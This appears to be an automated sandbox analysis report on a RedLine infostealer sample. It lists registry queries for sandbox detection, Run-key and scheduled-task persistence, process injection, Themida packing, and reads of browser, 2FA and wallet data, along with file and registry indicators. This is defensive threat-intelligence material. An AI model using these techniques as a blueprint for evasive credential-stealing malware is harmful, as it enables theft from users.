redline | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6261924.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6261924.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7937391.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7937391.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1545390.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6883636.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3787697.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3593047.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3593047.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1545390.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6883636.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3787697.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Lonasobyxe.exe

Loads dropped DLL 44 IoCs

pid	Process
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
1220	setup_install.exe
4228	Tue11b9d76a96506.tmp
4324	setup_2.tmp
5824	setup_2.tmp
3200	Tue112c483dd3245d.exe
3200	Tue112c483dd3245d.exe
3016	rundll32.exe
4828	Alfanewfile2.exe
4828	Alfanewfile2.exe
7152	rundll32.exe
4764	installer.exe
4764	installer.exe
4764	installer.exe
4768	MsiExec.exe
4768	MsiExec.exe
7512	rundll32.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4692	MsiExec.exe
4764	installer.exe
4692	MsiExec.exe
4692	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4572	MsiExec.exe
4692	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/files/0x000100000001ab71-271.dat	themida
behavioral3/files/0x000100000001ab77-290.dat	themida
behavioral3/memory/3160-293-0x0000000000BD0000-0x0000000000BD1000-memory.dmp	themida
behavioral3/files/0x000100000001ab71-273.dat	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2904185.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Jalytolaejo.exe\""	46807GHF____.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	rnyuf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\chromeupdate.cmd = "C:\\ProgramData\\chromeupdate.\\chromeupdate.cmd"	rnyuf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3787697.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6261924.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7937391.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3593047.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1545390.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6883636.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
68	ip-api.com
160	ip-api.com

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\rnyuf.exe	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 64822B7745EFCA16	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4836	3787697.exe
6048	3593047.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 1096 set thread context of 4456	1096	Tue11e4e580f2e8141a3.exe	99
PID 1096 set thread context of 5108	1096	Tue11e4e580f2e8141a3.exe	122
PID 1096 set thread context of 4476	1096	Tue11e4e580f2e8141a3.exe	115
PID 1096 set thread context of 792	1096	Tue11e4e580f2e8141a3.exe	129
PID 1096 set thread context of 5216	1096	Tue11e4e580f2e8141a3.exe	134
PID 1096 set thread context of 5616	1096	Tue11e4e580f2e8141a3.exe	141
PID 1096 set thread context of 5080	1096	Tue11e4e580f2e8141a3.exe	147
PID 2064 set thread context of 5448	2064	svchost.exe	160
PID 1096 set thread context of 5820	1096	Tue11e4e580f2e8141a3.exe	164
PID 1096 set thread context of 5388	1096	Tue11e4e580f2e8141a3.exe	165
PID 1096 set thread context of 5956	1096	Tue11e4e580f2e8141a3.exe	167
PID 1096 set thread context of 4296	1096	Tue11e4e580f2e8141a3.exe	182
PID 1096 set thread context of 6528	1096	Tue11e4e580f2e8141a3.exe	190
PID 1096 set thread context of 6792	1096	Tue11e4e580f2e8141a3.exe	192
PID 5696 set thread context of 4220	5696	postback.exe	196
PID 1096 set thread context of 4480	1096	Tue11e4e580f2e8141a3.exe	220
PID 1096 set thread context of 6500	1096	Tue11e4e580f2e8141a3.exe	226
PID 1096 set thread context of 7504	1096	Tue11e4e580f2e8141a3.exe	242
PID 1096 set thread context of 6832	1096	Tue11e4e580f2e8141a3.exe	250
PID 1096 set thread context of 6672	1096	Tue11e4e580f2e8141a3.exe	257
PID 1096 set thread context of 7632	1096	Tue11e4e580f2e8141a3.exe	259
PID 6444 set thread context of 7460	6444	services64.exe	264
PID 1096 set thread context of 4576	1096	Tue11e4e580f2e8141a3.exe	263
PID 1096 set thread context of 5276	1096	Tue11e4e580f2e8141a3.exe	267
PID 1096 set thread context of 6396	1096	Tue11e4e580f2e8141a3.exe	274
PID 1096 set thread context of 5652	1096	Tue11e4e580f2e8141a3.exe	275
PID 1096 set thread context of 1160	1096	Tue11e4e580f2e8141a3.exe	276
PID 1096 set thread context of 4592	1096	Tue11e4e580f2e8141a3.exe	278
PID 1096 set thread context of 7576	1096	Tue11e4e580f2e8141a3.exe	279
PID 1096 set thread context of 2912	1096	Tue11e4e580f2e8141a3.exe	280
PID 1096 set thread context of 7856	1096	Tue11e4e580f2e8141a3.exe	282
PID 1096 set thread context of 1264	1096	Tue11e4e580f2e8141a3.exe	283
PID 1096 set thread context of 4540	1096	Tue11e4e580f2e8141a3.exe	285
PID 1096 set thread context of 7352	1096	Tue11e4e580f2e8141a3.exe	286
PID 1096 set thread context of 7396	1096	Tue11e4e580f2e8141a3.exe	288
PID 1096 set thread context of 8164	1096	Tue11e4e580f2e8141a3.exe	290
PID 1096 set thread context of 2480	1096	Tue11e4e580f2e8141a3.exe	291
PID 1096 set thread context of 1028	1096	Tue11e4e580f2e8141a3.exe	293
PID 1096 set thread context of 2268	1096	Tue11e4e580f2e8141a3.exe	295
PID 1096 set thread context of 7756	1096	Tue11e4e580f2e8141a3.exe	296
PID 1096 set thread context of 6176	1096	Tue11e4e580f2e8141a3.exe	297
PID 1096 set thread context of 3176	1096	Tue11e4e580f2e8141a3.exe	298
PID 1096 set thread context of 4492	1096	Tue11e4e580f2e8141a3.exe	299
PID 1096 set thread context of 5324	1096	Tue11e4e580f2e8141a3.exe	300
PID 1096 set thread context of 7904	1096	Tue11e4e580f2e8141a3.exe	303
PID 1096 set thread context of 4804	1096	Tue11e4e580f2e8141a3.exe	304
PID 1096 set thread context of 5000	1096	Tue11e4e580f2e8141a3.exe	306
PID 1096 set thread context of 844	1096	Tue11e4e580f2e8141a3.exe	307
PID 1096 set thread context of 4432	1096	Tue11e4e580f2e8141a3.exe	309
PID 1096 set thread context of 6032	1096	Tue11e4e580f2e8141a3.exe	310
PID 1096 set thread context of 6220	1096	Tue11e4e580f2e8141a3.exe	311
PID 1096 set thread context of 4128	1096	Tue11e4e580f2e8141a3.exe	312
PID 1096 set thread context of 4252	1096	Tue11e4e580f2e8141a3.exe	313
PID 1096 set thread context of 6056	1096	Tue11e4e580f2e8141a3.exe	314
PID 1096 set thread context of 7196	1096	Tue11e4e580f2e8141a3.exe	315
PID 1096 set thread context of 4996	1096	Tue11e4e580f2e8141a3.exe	316
PID 1096 set thread context of 5588	1096	Tue11e4e580f2e8141a3.exe	318
PID 1096 set thread context of 7148	1096	Tue11e4e580f2e8141a3.exe	319
PID 1096 set thread context of 4588	1096	Tue11e4e580f2e8141a3.exe	322
PID 1096 set thread context of 7224	1096	Tue11e4e580f2e8141a3.exe	323
PID 1096 set thread context of 5176	1096	Tue11e4e580f2e8141a3.exe	325
PID 1096 set thread context of 6720	1096	Tue11e4e580f2e8141a3.exe	326
PID 1096 set thread context of 5868	1096	Tue11e4e580f2e8141a3.exe	327
PID 1096 set thread context of 5912	1096	Tue11e4e580f2e8141a3.exe	328

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Jalytolaejo.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files\Windows Media Player\BWCAQZXYMI\ultramediaburner.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-PK9GB.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-FA7JV.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Jalytolaejo.exe	46807GHF____.exe
File created	C:\Program Files\Windows Media Player\BWCAQZXYMI\ultramediaburner.exe	46807GHF____.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-8HP2V.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp

Drops file in Windows directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI19D2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6BAB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI1337.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI54EB.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f75ffae.msi	msiexec.exe
File created	C:\Windows\Installer\f75ffb1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5933.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI599.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI150D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1741.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1A9E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI546D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6974.tmp	msiexec.exe
File created	C:\Windows\Installer\f75ffae.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5334.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI1617.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5AAB.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5654.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI68C7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6ADE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6B1D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI63C5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6A12.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI71D7.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 30 IoCs

pid	pid_target	Process	procid_target
4768	4072	WerFault.exe	96
4132	5028	WerFault.exe	108
4224	4932	WerFault.exe	107
3564	5028	WerFault.exe	108
4132	4072	WerFault.exe	96
5296	5028	WerFault.exe	108
5288	4072	WerFault.exe	96
5516	5028	WerFault.exe	108
5508	4072	WerFault.exe	96
5684	5028	WerFault.exe	108
5148	4072	WerFault.exe	96
4524	5028	WerFault.exe	108
2892	5028	WerFault.exe	108
5584	5028	WerFault.exe	108
572	4072	WerFault.exe	96
5780	4072	WerFault.exe	96
4724	4072	WerFault.exe	96
6100	5956	WerFault.exe	167
7156	1228	WerFault.exe	201
6396	1228	WerFault.exe	201
2156	1228	WerFault.exe	201
5008	1228	WerFault.exe	201
4816	1228	WerFault.exe	201
4172	6876	WerFault.exe	219
7112	6876	WerFault.exe	219
5668	6876	WerFault.exe	219
7200	6876	WerFault.exe	219
7392	6876	WerFault.exe	219
7564	1228	WerFault.exe	201
7748	1228	WerFault.exe	201

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vbbsdtw

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Tue112c483dd3245d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Tue112c483dd3245d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Alfanewfile2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Alfanewfile2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1228	schtasks.exe
8056	schtasks.exe
4576	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6748	timeout.exe
6896	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5372	taskkill.exe
4792	taskkill.exe
6172	taskkill.exe
7292	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\skipvideoads.com\NumberOfSub = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
